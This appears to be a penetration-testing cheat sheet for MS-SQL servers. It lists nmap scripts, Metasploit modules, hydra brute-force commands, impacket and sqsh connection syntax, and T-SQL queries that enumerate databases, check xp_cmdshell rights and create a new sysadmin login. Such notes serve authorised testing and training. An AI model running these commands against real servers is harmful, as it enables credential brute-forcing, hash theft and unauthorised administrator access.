MS-SQL (port 1433)

To search for related scripts, run:

nmap --script-help "ms and sql"

#Nmap

#one liner
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0 

#Metasploit

msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Bruteforcing

hydra -L usernames.txt -p password 10.0.0.0 mssql
hydra -l username -P passwords.txt 10.0.0.0 mssql

#Connect

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database

#Commands

# List the database principals (users and roles) of the current database
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check whether the current user has permission to execute OS commands
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new login and add it to the sysadmin server role
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()
